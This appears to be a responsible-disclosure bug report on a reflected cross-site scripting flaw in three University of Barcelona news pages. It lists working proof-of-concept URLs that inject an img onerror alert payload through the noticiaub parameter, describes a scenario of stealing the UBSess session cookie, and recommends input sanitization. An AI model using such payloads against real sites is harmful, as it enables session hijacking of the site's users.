Abstract

Arbitrary Javascript code can be injected into the http://www.ub.edu/noticies/cgi/event.pl?id={id}&noticiaub={noticia}, [...]/cerca.pl?noticiaub={noticia} and [...]/cercar.pl?noticiaub={noticia} pages via the common noticiaub parameter.

Reproduction steps

1. Visit http://www.ub.edu/noticies/cgi/event.pl?id=131212&noticiaub=%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan, http://www.ub.edu/noticies/cgi/cerca.pl?noticiaub=%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan, or http://www.ub.edu/noticies/cgi/cercar.pl?noticiaub=%27%3E%3Cimg%20onerror=%22alert(document.domain)%22%20src=%22random%22%3E%3Cspan.
2. The Javascript code alert(document.domain) will be executed 3 times.

What should be done?

Sanitize the noticiaub parameter before being rewritten to the HTML structure.

Attack scenario

An attacker could form a URL with a Javascript script which, when opened by another UB member, would send the current session cookies to the attacker (for instance the sensitive UBSess cookie in ub.edu which can be accessed via HTTP).

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.